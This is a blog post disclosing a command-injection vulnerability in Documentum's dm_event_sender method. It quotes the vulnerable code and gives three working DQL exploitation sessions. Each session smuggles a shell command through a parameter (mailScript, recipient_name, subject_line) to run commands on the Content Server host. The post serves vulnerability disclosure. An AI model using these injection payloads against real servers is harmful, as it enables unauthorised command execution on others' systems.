documentum security vulnerabilities: dm_event_sender

dm_event_sender.ebs does not check input parameters, so any user is able to execute shell command on content server host using DQL queury.

'Send the completed email:

If platform$ = "WIN32" Then
    mailScript$ = ".\smail.exe"
    mailCommand$ = mailScript$ _
    & " " & "-nohttp" _
    & " " & "-delete_contents" _
    & " " & "-S " & subject_line$ _
    & " " & "-A " & recipient_name$ _
    & " " & "-F " & temp_file_name$ _
    & " " & "-Server " & smtp_server$ _
    & " " & "-M " & mail_user_name$
Else
    ' We must change the recipient if this is a single message bulk-mail.
    If do_single_message = True Then
        recipient_name$ = sender_name$
    End If

    mailCommand$ = mailScript _
    & " " & "-delete_contents" _
    & " " & subject_line$ _
    & " """ & recipient_name$ & """" _
    & " " & temp_file_name$
End If

If debug = "1" Then
  LogMsg("mailCommand= " & mailCommand$)
End If

result% = ShellSync(mailCommand)

exploitation of mailScript parameter:

 ~]$ cat /tmp/test.txt
cat: /tmp/test.txt: No such file or directory
 ~]$ idql repo -Uuser -Ppassword > /dev/null <<_EOF_
> execute do_method with method='dm_event_sender',
> arguments='"" "" "" "" "" "" "" "" "" "" "" "" ""
> "" "" "" "" "" "" "" "" "" "" "" "" "" "" "/tmp/xxxx"
> "/bin/echo dm_event_sender_has_vulnerability > /tmp/test.txt ;"
> " " ""'
> go
> _EOF_
 ~]$ cat /tmp/test.txt
dm_event_sender_has_vulnerability
 ~]$

exploitation of recipient_name parameter:

 ~]$ cat /tmp/test.txt
cat: /tmp/test.txt: No such file or directory
 ~]$ idql repo -Uuser -Ppassword > /dev/null <<_EOF_
> execute do_method with method='dm_event_sender', 
> arguments='"" "" "" "" "" "" "" "" "" "" "" "" "" "" "" 
> "\"; /bin/echo dm_event_sender_has_vulnerability > /tmp/test.txt ;\"" 
> "" "" "" "" "" "" "" "" "" "" "" "/tmp/xxxx" "" " " ""'
> go
> _EOF_
 ~]$ cat /tmp/test.txt
dm_event_sender_has_vulnerability
 ~]$

exploitation of subject_line:

 ~]$ cat /tmp/test.txt
cat: /tmp/test.txt: No such file or directory
 ~]$ idql repo -Uuser -Ppassword > /dev/null <<_EOF_
> execute do_method with method='dm_event_sender',
> arguments='"" "" "\`touch /tmp/text.txt\`"
> "" "" "" "" "" "" "" "" "" "" "" "" "" "WIN32" "xxx"
> "" "" "" "" "" "" "" "" "" "/tmp/xxxx" "" " " "127.0.0.1"'
> go
> _EOF_
 ~]$ cat /tmp/test.txt
 ~]$

This vulnerability was reported as CS-44443 (Security vulnerability with dm_event_sender allows execution of applications on Content Server host)

One thought on “documentum security vulnerabilities: dm_event_sender

  1. Pingback: Is it possible to compromise Documentum by deleting object? Typical mistakes | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s